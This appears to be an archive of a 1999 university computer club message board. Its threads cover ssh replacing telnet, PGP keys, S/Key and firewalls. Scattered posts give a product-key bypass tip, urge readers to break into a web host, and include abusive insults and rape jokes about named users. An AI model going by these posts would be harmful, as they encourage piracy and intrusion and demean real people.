        \_ .forward your email.  Your soda account by default is insecure
           since it is run and used by a bunch a hackers.
           \_ Huh?  How much more off topic could you get?
        \_ anyone notice you can telnet to another server and ssh from there?
           \_ Anyone notice how this COMPOUNDS the problem?  Don't.  --sowings
              \_ The PROBLEM is that soda isn't allowing telnet any more.
                 So no, it doesn't compound the problem
                 \_ Soda allows telnet.  It doesn't allow cleartext passwords.
                    Don't get mad, get clue.
                \_everything running over the telnet will be free game, before
                  it gets encrypted.
              \_ that was my point... a mandatory ssh on soda won't
                 necessarily force people to be safe...
                 \_ clue time: you can never force people to be safe.
                    \_ then why mandatory ssh?
                       \_ cuz smart people will simply download the software
                          and use ssh on the machine they're sitting at
                          instead of doing a roundabout telnet into another
                          machine.  which one is more of a hassle?
                          apparently some people think it's more convenient
                          to telnet then ssh each time. but then again,
                          berkeley admits some pretty stupid people.
                          \_ Worse yet, they give them degrees.
1999/7/12-14 [Computer/SW/Security, Transportation/Bicycle, Computer/SW/OS/Windows] UID:16115 Activity:high
7/12    a good windows mail client that supports pgp?  Wait, i know, RIDE
        BIKE, use linux, I DO, but i need *others* to use pgp with and
        the others use windows.
        \_ Outlook
           \_ Outlook?  What version?  Last v. I tried was complete trash.
        \_ ok, pardon my ignorance, but could someone please explain the
           connection betwen Linux and RIDE BIKE ?
           \_ Guessing: someone is mocking the attitude/mentality of both
              groups?
              \_ How does that differ from the 50 million "Windoz Rulez,
                        \_ Who said it differed?
                 use windows" that also go on the motd, not to mention that
                 their attitudes and mentality are usually worse.  I also
                 seem to remember a quote, "drive a fucking car you hippie"
                 posted somewhere on a long ago motd showing taht non-bike
                 riders are just about as bad.
                 \_ PGP for Windows (commercial, from NAI) will integrate
                    well with Eudora Light or Pro.  However, Eudora light
                    tends to corrupt important Windows files and generally
                    suck.  --dbushong
        \_ ride bike.
        \_ use freebsd.
        \_ use linux.
           \_ freebsd >> linux
        \_ use Motd::Public;
        \_ Less filling >> tastes great
1999/7/11-14 [Computer/SW/Security] UID:16104 Activity:low
7/10    Anyone know if someone has written an SKey generator for the
        Palm OS?  Would be handy to have the key generator handy...
        \_ http://astro.uchicago.edu/home/web/valdes/pilot/pilOTP
           i haven't tried it yet tell me if it works  --oj
                \_ YES, it works.  just logged in with it.  thanks!
                   no excuses to not use skey now...
                   \_ How about, "I don't have a Palm Pilot"?
        \_ Any source code out there for S/Key?
           \_ /usr/src/usr.bin/key/skey.c on soda  --dbushong
1999/7/6 [Recreation/Dating, Computer/SW/Security] UID:16085 Activity:nil
7/6     Do you guys think that http://whitehouse.com shouldn't be what it is?
1999/7/2 [Computer/SW/Security] UID:16057 Activity:high
7/1     Sorry to bring another ssh question to the motd, but I thought
        others might be interested.  So my company doesn't have ssh
        installed, but there *is* a machine I can telnet out of without
        going through the proxy.  I compiled ssh over there, and I can't
        get it to connect to soda.  I checked man pages, and the ssh url
        above, but it still dies.  Here's the command line and result:

        > ssh -a -v -l emarkp http://soda.csua.berkeley.edu
        SSH Version 1.2.27 [sparc-sun-sunos4.1.4], protocol version 1.5.
        Standard version.  Does not use RSAREF.
        host183: ssh_connect: getuid 27243 geteuid 27243 anon 1
        host183: Connecting to http://soda.csua.berkeley.edu [128.32.43.52] port 22.
        host183: connect: Connection timed out
        host183: Trying again...

        Any ideas on how to fix? -emarkp
        \_ ssh on outgoing port 22 on your firewall is blocked,
           as in not open.
           \_ but emarkp was able to get "ssh-1.5-1.2.26" from telnet pt 22?
        \_ woah, they have suns at intel?
           \_ ssssh!  Don't let anyone else know. :)  I don't know how
              long this system has been in place.  --emarkp
              \_ suns are better than intels. and for that matter, so is
                 everything else. but intels are cheap which is good
                 enough for my purposes.
        Any ideas on how to fix? -emarkp
        \_ Hint: try  "telnet http://soda.csua.berkeley.edu 22" first.
        \_ try it again now that the campus network is back up...
           \_ I did.  There wasn't even this much when the network was
              down. --emarkp
           and say hello to mister firewall.
           \_ Actually, I got through.  That is, it said:
              Connected to http://soda.csua.berkeley.edu.
              Escape character is '^]'.
              SSH-1.5-1.2.26
              -- emarkp
                \_ Now remove the setuid root bit from ssh.
1999/6/30-7/1 [Computer/SW/Security] UID:16045 Activity:nil
6/30    Telnet access to Melvyl and Gladis turned off for security
        reasons. ssh only.
        \_ I thought you did't need a password to get on the library
           database.  Is that true?  If so, why does it matter if it's
           secure or not?
           \_ Um, have you ever heard of sarcasm?  How about trying
              "telnet melvyl" yourself to see if this was accurate (it's
              not).
                \_ Imagine that!  Someone sniffing my melvyl login and doing
                   their own research!  Nefarious!
1999/6/30-7/1 [Computer/SW/Security] UID:16040 Activity:moderate
6/30    I asked another host machine to install a ssh client so that I could
        telnet there and then ssh to soda.  Thing is, I can't connect
        because soda doesn't support ssh protocol v2.  Does anyone know
        about plans to change this?
        \_ there's a slightly easier way to do this and it doesn't involve
           asking someone else to install something for you.
        \_ when data fellows makes their ssh2 implementation less stupid
           about their license.
        \_ ssh2 is still in testing and not free for use.  Have them install
           ssh1 as well.
        \_ Ride BIKE!
        \_ Compile your own.
        \_ Interestingly (to me anyway), this only puts the security breach
           one step back.  Instead of a cracker sniffing your soda account,
           \_ the point is that soda's subnet is filled with lemurs.
           they can sniff your other telnet account, and then ssh from there
           to soda and wreak all sorts of terrible havok!
           \_ Telneting somewhere just to be able ssh to soda is a really
              stupid idea.  It not only defeats the security that the soda
              admins are trying to establish, but also compromises the other
              account as well.  Get off your ass and install ssh on your owm
              machine or explore the possibility of using s/key.
              \_ The soda admins are trying to protect against sniffers on this
                subnet.  Telnet->ssh is no dumber than purely telnet,
                and given the number of lemurs probably a bunch safer.
1999/6/28 [Computer/SW/Security] UID:16029 Activity:high
6/28    The CSUA account is mainly for social use, and it's not a
        mission-critical system. I've been using the Soda account for
        almost 6 years, and have found it's very convenient since it does
        not impose many of the restrictions of regular ISP accounts.
        Therefore, I was quite puzzled by the SSH stuff -- I understand
        the importance of security, but isn't the CSUA system is a
        hacker's system? The decentralized nature of Soda is what made it
        wonderful. If the current CSUA leadership wants to impose the
        security measures, can you at least ask for feedback and inputs
        from the users? I was surprised to see the login message without
        hearing anything about the merit of this decision. I suggest for
        now, the decision to shut down telnet should be postponed.
        \_ I second that motion (even though this thread already ran a few
           days ago)
        \_ Need to have the rms:rms account turned on.
1999/6/27-7/15 [Computer/SW/Security] UID:16023 Activity:nil
06/25 IMPORTANT INFORMATION:

   ************************************************************************
   * Secure password software will be REQUIRED starting July 15th, 1999   *
   ************************************************************************
   *     Starting July 15th, all remote logins to CSUA Computers will     *
   *      require an ssh enabled program for login over the network;      *
   *                                                                      *
   *        -=  STARTING JULY 15th TELNET WILL BE DISALLOWED. =-          *
   *                                                                      *
   *                   For detailed information see:                      *
   *    /csua/adm/doc/ssh-howto   or                                      *
   *    http://www.csua.berkeley.edu/ssh-howto.html                       *
   *             If you have questions, please mail help@csua             *
   ************************************************************************
1999/6/25 [Computer/SW/OS/OsX, Computer/SW/Security] UID:16017 Activity:high 66%like:16014
6/24    It's about time EECS instructional finally enforced an ssh only policy.
        \_ Report them to the Commerce Dept.  They're allowing foreigners to
           use encryption!  That's illegal, the unamerican scum.
           \_ Fuck you.  --sowings
           \_ Oh no, we wouldn't want that to happen would we?
        Now for every other machine on campus to follow suit.
                                                        \_ ^suit^suite
                                                        \_ it's suit, dumbass
        \_ Funny, it's rare that we're in the vanguard.  You should check
           "finger @cory.eecs" though--lots of lusers still stuck with telnet.
                                                                --sowings
           \_ What the hell is so hard about using ssh? ^telnet^ssh
                \_ Part of it may be that users are at a commercial site with
                   a non-SSH-friendly firewall.  --sowings
                \_ Not everyone uses an OS that has ssh.  Not everyone has
                   an OS.  Don't be so OScentric.
                   \_ Everybody IS using an OS that can run ssh (no I'm
                      not talking about Palm Pilots).
                        \_ I work at a secure site that has a terminal/modem
                           that I use to dialout to an annex box on campus
                           and then telnet to soda.  Who the fuck are you to
                           tell me my OS supports ssh?  I don't have an OS,
                           dumbshit.
                           \_ will EECS install an s/key server?  we do that
                              here for cases like this, because we don't
                              trust users to protect their reusable passwords.
              \_ Furthermore, some of us work behind a firewall which
                 does not have ssh enabled (I know how stupid that
                 sounds, but it's true).
                 \_ I use ssh behind a firewall all the time.  Mail root
                    and tell him what a moron he is for configuring a
                    firewall improperly.
        \_ I would love to use SHH -*BUT*- there is *NO* free ssh for windows
                I know you'll all say use linux, but I don't - so there!
                \_ There have been free versions for quite a while loser.
                   http://www.net.lut.ac.uk/psst Get a new excuse.
                   \_ And given that Window$ versions are already compiled
                      they have less of an excuse not to use ssh than Unix
                      people do. Yet the statistics reflect the opposite.
                      \_ WinBlows twits are stupid.  proof: axiom 1.
           \_ Windows: http://www.zip.com.au/~roca/ttssh.html
              Mac:     http://www.lysator.liu.se/~jonasw/freeware.html --dim
           \_ TeraTerm? http://depot.berkeley.edu always has free stuff.
           \_ Why is ssh free for UNIX but not for Win or Mac? Is it a patent
              issue?
              \_ porting stuff across unix tends to be very easy (ie. almost
                 nothing to do) whereas writing a port for Win or Mac is a
                 total pain in the ass to do.  Hence, people who do write
                 the ports ask for $$$.
                 \_ They must be evil for not doing it out of the GNUoodness
                    of their hearts and for the love of technology.
           \_ A free port at
              http://akson.sgh.waw.pl/~chopin/ssh/index_en.html
        \_ just a random check on soda:
           netstat -n | awk '($4 == "128.32.43.52.22") {print}' | wc -l
                126
           netstat -n | awk '($4 == "128.32.43.52.23") {print}' | wc -l
                83
            --jon
            \_ what is port 22 for?
                \_ ssh moron
                   \_ why did this deserve a "moron"? i'm sure at one time
                      you didn't know what port 22 is for, or even what a
                      port was.
                        \_ look in /etc/services moron
                           \_ Wow, you're a real asshole.  The guy knew what
                              the command line did, but didn't know a lousy port
                              number and isn't a linux s00per g0r0 like you
                              so he's a moron?  Are you Trevor Buckingham?
                              \_ No, *I* am Trevor Buckingham!
                                 \_ Please start smoking pot instead of crack.
                                \_ I am Jean Valjean
                                   \_ My name is Paolo Soto, you got into the
                                      LSCS major, prepare to die.
1999/6/24-25 [Computer/SW/Security, Computer/SW/OS/OsX] UID:16014 Activity:very high 66%like:16017
6/24    It's about time EECS instructional finally enforced an ssh only policy.
        Now for every other machine on campus to follow suite.
        \_ Funny, it's rare that we're in the vanguard.  You should check
           "finger @cory.eecs" though--lots of lusers still stuck with telnet.
                                                                --sowings
           \_ What the hell is so hard about using ssh? ^telnet^ssh
                \_ Not everyone uses an OS that has ssh.  Not everyone has
                   an OS.  Don't be so OScentric.
        \_ I would love to use SHH -*BUT*- there is *NO* free ssh for windows
                I know you'll all say use linux, but I don't - so there!
           \_ Windows: http://www.zip.com.au/~roca/ttssh.html
              Mac:     http://www.lysator.liu.se/~jonasw/freeware.html --dim
                \_ TeraTerm? http://depot.berkeley.edu always has free stuff.
           \_ Why is ssh free for UNIX but not for Win or Mac? Is it a patent
              issue?
              \_ porting stuff across unix tends to be very easy (ie. almost
                 nothing to do) whereas writing a port for Win or Mac is a
                 total pain in the ass to do.  Hence, people who do write
                 the ports ask for $$$.
                 \_ They must be evil for not doing it out of the GNUoodness
                    of their hearts and for the love of technology.
           \_ A free port at
              http://akson.sgh.waw.pl/~chopin/ssh/index_en.html
1999/6/22-25 [Computer/SW/Security] UID:16002 Activity:moderate
6/21    Can anyone give a pointer to a utility that will recover passwords
        from a MS Access .mdw workgroup file?
        \_ http://www.lostpassword.com -shac
        \_ Can anyone give a pointer to a utility that cracks passwords
           on Access files?  How about Unix /etc/passwd files?  MS
           installer codes?
                \_ MS Install product keys: Try using all 1's.  Works every
                   time I've tried it!  Office, DevStudio, SourceSafe, etc.
                        \_ Some take all 0's instead/as well.
                        \_ I think only the CS department copies can do that.
                           Normal Office/DevStudio CDs don't allow that.
                           \_ UC doesn't get special copies of anything.  I've
                              seen the boxes, installed the software, etc.  It's
                              generic.  At least for Office and the OS.  Didn't
                              install DS but the CD's looked the same.
                        \_ All "4" works on some stuff too.
        \_ fdisk.
1999/6/18-19 [Computer/SW/Security, Computer/SW/Unix] UID:15985 Activity:very high
6/18    How much for a life account on soda?
        \_ soda account and having a life are mutually exclusive.
        \_ u must FIRST bring back root a SHRUBBERY!
            \_ namely marijuana
               \_ or MDMA
                \_ dissociatives are bad for you.
                   \_ It's all bad for you.
                      \_ is this what you learned from government sanctioned
                         propaganda and programs like D.A.R.E ? You're the kind
                         that they like, follow directions, don't question
                         authority and you'll do fine.
                         \_ No, child, this is what I learned from
                            watching my girlfriend destroy her life.
                            You're a prick.  Little wannabe druggy
                            fucks all think they're so smart and anti-
                            government-conspiracy and all that bullshit.
                            Well, clue time.  You're just a dumb shit
                            moron burning out your brain and body.
                            I'm not a child of the DARE generation.
                            I'm a child of the been-there-knows-that-
                            first-hand generation.
                         _/
                   Then someone of your OBVIOUS wisdom, and intelect
                   would surely refrain from generalizing comments
                   like, "it's all bad" I bow before you unending
                   insight and wisdom, but clearly you can't be
                   serious about comparing your crack-whore gf to
                   an occasional pot smoker or social drinker.
                        \_ You're a prick.  Please dope up and drive off a
                           cliff and drown to death.  The world will be a
                           better place.
        \_ First you must get a life.  Life accounts are only awarded to those
           who graduate with all 5 life points.
1999/6/11-12 [Computer/SW/Security, Computer/HW] UID:15946 Activity:high
6/11    Thirdvoice again!  http://nototv.hypermart.net
        seems they have added some javascript, and put it into the
        public domain, that hoses thirdvoice's functionality.  they
        are using refresh loops (KLUDGE) to flush the notes every
        1000 milliseconds or something.  really screwey, and it
        has a tendency to crash things.  also, thirdvoices server has
        been hosed today.  i am thinking that with each flush, my
        client tries to get the notes from thirdvoice, then the
        connection gets abandoned and leaves a zombie http connection
        that their server takes x tens of seconds to flush out.  so,
        the hypermart people are, in a way, mounting an attack on
        thirdvoice.  probably a great time for any of you good hackers
        to get into hypermart and fuck shit up.  -caliban
        \_ can't you just hit the Stop button / Escape?
        \_ All I can say is kludges are just that, kludges.  -Judd
        \_ thirdvoice is really racking up the enemies.  Either abovenet
            died or someone threw a denial of service attack at them.
            \_ got any more info?  -caliban
                \_ I do.  Send a resume.  :-)   -Judd
                \_  it was just paranoia -- one of abovenet's cat5000'si
                    'got confused'.
        \_ apparently http://www.macosrumors.com has come out against 3v too -caliban
            \_ I'm tellin you, its all them snooty web designers, who dont
               want to hear someone making bad comments on their sites. -ERic
            \_ I'm against hatred and war.  Hasn't stopped hatred and war.
1999/6/8-9 [Computer/SW/WWW/Browsers, Computer/SW/Security] UID:15917 Activity:high
6/8     Commentary on third voice:
          http://www.macnn.com/contributions/webpages.shtml
          \_ can anyone see the notes posted on that page?  i have
             thirdvoice installed, and it works on other pages.  there
             are notes posted on that page; thirdvoice pulls up the
             topics in their frame but i am unable to read them.
             clicking on the note icon in the text does not work.
             i get an occasional javascript error, i wonder if they
             are hosing the thirdvoice stuff somehow.  --caliban
             \_ I can read it ok.  That's what public betas are for.  If you
                mail your system details and the URL to feedback@thirdvoice.com
                someone will check it out.  -Judd
             \_ strangely enough that site's annotations are failing in my
                3rdvoice client too. -Eric
          \_ Watch the web designer weenies whine!  They just can't share the
             internet.
          \_ Amazing! Singaporeans pushing the limits of free speech.
            \_ Yeah, go figure!
1999/6/4-5 [Computer/SW/Security] UID:15906 Activity:moderate
6/4     http://Amazon.com wanx.  Amazon lets the publishers have access to
        customer reviews two days BEFORE they are actually posted,
        giving them time to write up two or three 'good' reviews
        the same day the 'not-so-good' review comes out.  Eg., look
        for books written by Steve S. Miller, published by McGraw Hill.
        His books absolutely suck, but he somehow has all these
        totally cheesy reviews posted by anonymous readers who all
        say the same overly complimentary things.  Stuff you'd never
        find on the Soda motd.
        \_ sounds legal and like standard business practice to me
        \-while i think this kind of disclosure/discussion is useful, i dont
        look to amazon for book reviews ... i want one thing from them and
        that is cheap prices and decent customer service. in my experience
        "truth" comes out of a dialectic ... from reading multiple sources.
        generally you shouldnt look for "one relaible source" ... unless
        it is me or the ecomonist. --psb
        \_ Uh, The Economist has its idiosyncracies too (e.g., declaring that
        Clinton should resign the week Monica-gate broke: a little
        premature, as they themselves later admited) --Economist Reader
1999/5/23-25 [Computer/SW/Security, Computer/SW/Unix] UID:15862 Activity:high
5/23    Did you hear that Ari and Christine are married?
        \_ "If you need to ask, you don't know."
        \_ Why should we care?
        \_ How many times have we heard about this?
        \_ Which Christine?  (Which login?)
                \_ the one with 3 different logins because she can't make
                         up her mind.
                \_ The one that's been living with ari for years.  If you
                   don't know her login, you don't know her and don't need
                   to know.  (Hint: If you pay any attention to walls, you
                   know who.)
                \_ Why does anyone care?  Just shut up.  It's not like, "Did
                   you hear Ari and Christine are tag team serial killers?"
                   \_ This is outrageous.  There is no evidence that
                      Christine has help Ari with any of his crimes,
                      especially not serial killing.
                        \_ there's a website out there of her holding down
                           twaung while ari rapes him
                           \_ http://www.networkgen.com/~twaung/images/bean1.jpg
                              \_ Damn!  I got 403 Forbidden.
                              \_ what kind of lamer puts an image in
                                 his PUBLIC HTML "images directory, then
                                 revokes view privilege for it? Either
                                 have it there, or not. sheesh.
                           \_ I thought it was Ari holding him down while
                              xtine raped him.
                   \_ I just want to check out her pics if she has a home page,
                      to see how lucky/unlucky Ari is.
                        \_ Ari is filthy rich, Christine is a lot hotter than
                           your hand, you just lose in comparison.
                           \_ I dunno dood....My hand is pretty good looking.
                        \_ ~chris
                        \_ Boy-child, luck has nothing to do with it.  The
                           sooner you get over that idea, the sooner you'll
                           be making love to a woman instead of your hand.
                           \_ And if you're Ari, this will include cheating
                              too.
                              \_ What?  Do tell!
                           \_ That was what I thought until I have this
                              hot babe fall from the sky.
                                \_ What'd she weigh?  Or did you let her
                                   bounce a few times first?
1999/5/20-21 [Computer/SW/Security] UID:15848 Activity:nil 66%like:16541
5/20    Access to Software for All People jobs is /csua/pub/jobs/ASAP
1999/5/19-20 [Computer/SW/Security, Computer/SW/Unix] UID:15840 Activity:high
5/19    Dear root
            It would be really cool if you could remove all the old job
            listings from /csua/pub/jobs, I'd be more than happy to do
            it myself but my BSD security compromising fu is lacking.
            You see I need to find a job so I can afford an NT license,
            I can't get any work done without that wonderfull paperclip
            helping me along the way. Thank you very much and may god
            love you for ever.                  job-less on CSUA
            \_ find a headhunter.  try http://dice.com
            \_ Wired is hiring.  http://www.hotwired.com/jobs  good luck.
            \_ ls -l will tell you when a company's job listing was
               last fiddled with.  Old listings' job openings probably
               don't exist, but the company probably still does.  If
               the company sounds interesting, try their website.
1999/5/17-18 [Academia/Berkeley/CSUA, Computer/SW/Security, Computer/SW/Unix] UID:15822 Activity:kinda low
5/17    PLEASE clean up your old crap in the /csua/pub/job dir!
        \_ I'd like to, but all the files and dirs I put there before are now
           owned by root.
Darth Maul kills Qui-Gon.
                \_ root would be happy to help you with this problem.
1999/5/15 [Computer/SW/Security, Computer/SW/Unix] UID:15815 Activity:high
5/15    It's the "Message Of The Day", not "Messages Of Last Week".
        If you don't want it nuked, start something fresh.
        \_ It's also not the standard root-only motd.  You want it wiped
           once a day, petition root to make a cron job.  Since you obviously
           don't "get it", just use a .hushlogin and leave the rest of us
           alone.
        \_ I don't want it wiped once a day, I want it to not be full of
           stupid trollfests from a week ago that keep getting replaced
           by the original trollers.
           \_ Dumbshit, nothing on the motd was more than 48 hours old.  Get
              a fucking calendar.
        \_ maybe ERic should stop rcsing the motd.  That is how poeple
           get old copies to replace it with.
           \_ No it isn't.  It is actually possible to save a copy yourself.
              This may come as a stunning revelation to you, but the cp
              command isn't root only.
1999/5/7 [Computer/SW/Security] UID:15769 Activity:high
5/6     /usr/local/bin/premail is installed.
        It connects to the "nym" remailer.
        It requires pgp2.6 to work.
        The nym server uses a 2048 bit key.
        Ours only supports 1024 bit keys.
        \_
        jon@soda:~ ttyRP 1:19:07am 6% pgp -kg
        Pretty Good Privacy(tm) 2.6.2 - Public-key encryption for the masses.
        (c) 1990-1994 Philip Zimmermann, Phil's Pretty Good Software. 11 Oct 94
        Uses the RSAREF(tm) Toolkit, which is copyright RSA Data Security, Inc.
        Distributed by the Massachusetts Institute of Technology.
        Export of this software may be restricted by the U.S. government.
        Current time: 1999/05/07 08:22 GMT
        Pick your RSA key size:
            1)   512 bits- Low commercial grade, fast but less secure
            2)   768 bits- High commercial grade, medium speed, good security
            3)  1024 bits- "Military" grade, slow, highest security
        Choose 1, 2, or 3, or enter desired number of bits: 2048
        Generating an RSA key with a 2048-bit modulus.
        --I dont know who the fuck you are, but 1) you didnt mail root
        and 2) you arent even smart enough to read the fucking directions
        that pgp gives you on a fucking silver platter.  --Jon
        \_ Valium, homeboy.  He probably meant that pgp supports a
           maximum 1024 bit keylength.  -John
                \_ but it doesn't.
                   \_ Yes, I know that, and you know that, but it didn't
                      show up in the options and he was probably tired
                      and didn't think that far.  No reason to go apeshit.
                                                        -John "fuck"
                        \_ wierd. tried again, it worked now. BUt it
                           failed before, complaining aobut keylength.
        \_Why is soda stuck on 2.6.2?  PGP 5 is available for *NIX, with 6
        available within the month.  6 supports 4096-bit keys, which if you
        read Cryptonomicon (Neal Stephenson's new book) is secure for 100 years
        and may even be suitable to keep secure until men are no longer
        capable of evil! (forever).  As far as I know, the book does not have
        a protagonist who attended UCB in the 90's and studied CS (as snow
        crash did) --cody
        \_
        /usr/local/bin/pgp      /usr/local/bin/pgpencrypt
        /usr/local/bin/pgp5             /usr/local/bin/pgpk
        /usr/local/bin/pgp_old          /usr/local/bin/pgps
        /usr/local/bin/pgpdecode        /usr/local/bin/pgpshow
        /usr/local/bin/pgpe             /usr/local/bin/pgpsign
        /usr/local/bin/pgped            /usr/local/bin/pgpv
        --Jon. Hint Hint, it is possible to have both installed.
1999/4/5 [Computer/SW/Security] UID:15695 Activity:high
4/5     If sshd does host authentication for .shosts files why do people still
        say that .shosts is still insecure.  This is assuming that all the
        entries point to a computer that I maintain and I am the only user
        on that system.
        \_ how do i use shosts?  is it the same as rhosts?
        \_ if someone breaks into that system, they can steal the host
           key.  But .shosts is reasonably secure. -tom
           \_ How secure is having tcp-wrappers blocking all external
              connections and running this computer on a ppp dialup
              connection that times out after 15 minutes of inactivity.
              I'd think it would be pretty obvious if someone broke in.
                \_ tcpwappers probably doesn't wrap all your services. -tom
1999/3/30-31 [Computer/SW/Security, Computer/SW/OS/Windows] UID:15662 Activity:nil
3/30    In a /lib /usr/lib directory what's the diff between a lib*.a and
        a lib*.so file?
        \_ .a is "archive" and produces static (compile-time) linking, while
           .so is "shared object" and produces dynamic (run-time) linking.
           \_ so what the heck is "linking"?
                \_ man ld
              \_ well, if you're a DOS weenie, a .so file is like a .DLL file
                 in short: .a files are things that get added to your program
                 when you compile it; people don't need them to run the
                 executable, but it's huge.  .so files get "added" (linked)
                 when a person runs the program, so they need to have copies
                 of them, but the executable is smaller.  generally .so
                 (shared libraries) are better because then 100 programs on
                 your machine can use one library without (essentially) having
                 100 copies of the library present in every executable -dbushong
1999/3/29-30 [Computer/SW/Security] UID:15652 Activity:moderate
3/29    Is there a cel phone service in the area that lets me call in the
        entire state?  I want to be able to use it both here and Los Angeles.
                                                        -- brendal
        \_  yes.  have you even looked at any of the service providers yet
            at all?  cellone and gte have both been advertising this sort
            of option heavily.  the former lets you call from anywhere in
            california but hasn't come out with a nationwide plan yet.  gte
            has a national onerate service plan.
        \_ Pacbell PCS does it if you get an extra $20/month plan named
           WildFire.  GTE does not do it.  L.A. is roaming at 0.40/min.
           Sprint does it but has no coverage on the long-distance freeways.
           PacBell and CellOne are the solid west-coast choices.  Otherwise
           GTE or Sprint would be cheaper if you are on the east coast too.
1999/3/29-30 [Computer/SW/Languages/C_Cplusplus, Computer/SW/Security] UID:15649 Activity:moderate
3/29    How do I test to see if a file has "other" +"read" permissions in C?
        \_ man 2 stat?
        \_ or check out the access(2) manpage.
           \_ stat doesn't have anything to do with accessibility and access uses
              user ID to check for access
                \_ which part of "mode" don't you understand?
                \_ stat has this:
                        mode_t st_mode /* File mode */
1999/3/12-13 [Computer/SW/Security] UID:15584 Activity:nil
3/11    There's ssh and scp.  Is there sftp?  I want to interactively get
        and put a file.  scp is rather inconvenient.
        \_ DataFellows ships an sftp but it's just making an ssh tunnel
           to the ftp-cmd channel for you to use.  It only secures the
           command channel and requires that you have some account on the
           remote machine.  Due to the design of the ftp protocol, it
           is difficult to secure the data channel, though there are ways to
           do this that involve a bit of work on the part of an administrator.
           --jon
           \_ I'm sure you could just write a little script called sftp that
              would establish a secure channel and tunnel ftp automatically.
              \_ no, you can not do it with a simple shell script for
                 the data channel.  The command channel is simple, data is
                 not with most of the unix ftp clients available.
              \_ in many cases, you need to hack the ftp client from source
                 (or edit raw binary for the truly fooful) to get it to
                 use arbitary host:port's for the data channel (you need to
                 use ftp's passive mode btw).  There is a way to combine both
                 the data and command channel for easier forwarding through
                 a novel use of a socks proxy.  This is the "bit of work" to
                 which I earlier referred.  --jon
                 \_ Most people only really care about securing the command
                    channel because of the password.  If you were working
                    on something top secret, however, that would be a diff
                    story and you should just use the inconvenient scp.
                 \_ How about:
                    ssh -f -L 1234:csua.berkeley.edu:23 http://csua.berkeley.edu
                       sleep 20 </dev/null >/dev/null
                    as adapted from the fetchmail manpage?
           \_ What about writing an expect script to transfer files using
              ssh?  For example, if I want to get a file to my machine
              from soda I can do:
              ssh soda -C cat filenameOnSoda > fileNameOnMyMachine
              You can use the same trick to send a file.  You could
              write a script that would also let you do ls and other
              stuff too.  -emin
              \_ the nice thing about a "secure ftp" is that you
                 amortize the cost of the SSH authentication process
                 over the transfer time of a number of files rather
                 then once for each file transferred, and yet you
                 can still deal with files on a individual, interactive
                 basis.  Doing ls via another ssh-wrapper would just
                 add to the number of ssh-authentications needed, which
                 for some users is a high cost.  --jon
        \_ Try SRP. It provides a secure ftp and ftpd, along with a few other
           cool security features.
                \_ Can someome who has looked at SRP explain what it is about?
1999/3/10-11 [Computer/SW/Security] UID:15574 Activity:very high
3/9     Given all the network sniffing that goes on, how about turning off
        telnet and rlogin on soda and force everybody to use ssh?  I think
        the cost of dealing with ssh problems outweighs the consequences of
        a break-in.  What do you guys think?
        \_ no ssh installed on UCB dialup CLI connections
           \_ I honestly have to wonder how many people still use CLI
              from the annexen.  --sowings
              \_ All the lazy people who don't want to bother to setup ppp.
        \_ Discriminates against our non-US-citizen members who we legally
           aren't allowed to let use ssh/sshd.  (Stupid US goverment fucknuts)
           \_ sshh...you don't want to make fun of the US govt. They might
              be watching the motd and consficate soda.
           \_ You're wrong; the most popular implementations of SSH for all
              major platforms (Windows/Mac/Unix) are developed and sold
              outside of the US.  The US is starting to lag, not lead, in
              crypto software, because of crypto export laws.
                \_ So.  That has nothing to do with the CSUA violating the
                   law everytime it allows a non-citizen to use encryption
                   software - even if they downloaded ssh on their own, it's
                   useless without the sshd software running on soda.
           \_ I know of a supercomputer center run by the government and
              foreign users connecting to that system MUST use ssh.
              If it's OK for them, it's probably OK for soda.  --peterM
        \_ There is no free SSH client for Windoze, to my knowledge
           -muchandr
           \_ http://www.zip.com.au/~roca/ttssh.html --dim
           \_ F-Secure SSH seems to be free as well.
                \_ only for 30 day trial
           \_ Then you should look at http://www.net.lut.ac.uk/psst
                and learn much...
           \_ http://www.ocf.berkeley.edu/~tee/ssh
        \_ who cares?
                my ssh key into an sshd on a machine run my people i dont
                \-I think this is an insane idea. I dont want to type
                my ssh key into an sshd on a machine run by people i dont
                know and i dont trust ... and I would rather not set up a
                "low security" ssh key in addition to my regular one.
                given all the network sniffing that goes on, use rhosts
                and dont trust soda on machines you care about.
                What are you going to do about the XDM machines?
                I disagree with your cost-benefit analysis. The cost of a
                compromised passwd isnt that high. The cost of a compromised
                ssh key is high. For one thing, the hacker can hide from IDS
                systems. I wont go on any more. It was reasonable to float
                this balloon, but crazy to jump on it. --partha "i watch the
                net" banerjee
                \_ you never ever type your ssh-passphrase to
                   a remote process.  the remote sshd, when you use
                   RSAAuthentication, provides you a challenge to which you
                   respond.  That response is the equivalent  of doing an
                   RSA encrypt with your private key which the remote
                   sshd tries to decrypt with the public key you deposited
                   on the remote host earlier.  If what the remote sshd
                   obtained by decrypting your response  with your public
                   key and and the original challenge coincide, then you
                   are authenticated.  Of course, if you do not trust
                   RSA, and think someone may use your public key to obtain
                   your private key and the pass prase you use to further
                   protect it against local machine attacks, thats another
                   story. --jon
                \_ Oh great psb, please sniff my network in a sexual way.
                                -psb #1 fan
                   \_ Poser.   The real -psb #1 Fan
                \_ Uh, partha, you do realize that you don't need to use
                   RSA authentication to still get most of the benefits
                   of ssh.
                        \- yes but realistically you see more trojaned
                        clients and daemons than seq number or spoof attacks.
                        my point was this imposes a reasonable cost for people
                        who log in from a lot of different machines.
                        \_ It would be pretty obvious if you had logged into
                           a trojaned sshd server. In addition to the server
                           authenticating you the client also authenticates
                           the server and spews a nasty message if the
                           authentication fails.
                        \_ What do seq number or spoof attacks matter?  The
                           attacks we see daily on campus are packet sniffers.
                           ssh eliminates the threat of packet sniffing
                           script kiddies, whether or not you use RSA
                           authentication.  -tom
                           \_ I think he is saying that he believes one is
                              better off using rlogin and .rhosts as
                              attacks spoofing a connection from a
                              trusted host or attempting to hijack your
                              connection are rarer than trojan attacks.
                                --sky
                  \_ Do you passively sniff traffic or do you run the IDS
                  on a gateway and dynamically block packets?  If you are
                  just passively watching the traffic, until TCP/IP
                  stacks are standardized, your IDS can be circumvented 7
                  ways to sunday.  Its so easy to inject packets that will put
                  the IDS and the target host's stack in inconsistant states.
                  How do you deal with something as simple as TTL?  --sky "i
                  0wn j0r n3t w1th my 31337++ hAx0r sk1LLz" king
                        \-the TTL problems is in fact tricky and really
                basically intractible. i think we are cleverer than you
                think. i cant discuss exactly what we do, but if you have
                some attack based on ttls ot fragmentation or whatever,
                anything stealthy, as opposed to a flood/DoS, we would be
                interested in talking to you to see if you can evade our
                monitor. the commercial monitor cos are just interested in
                profit maximizing ... so if it would take a huge effort
                to fix something and lacking that one thing isnt hurting
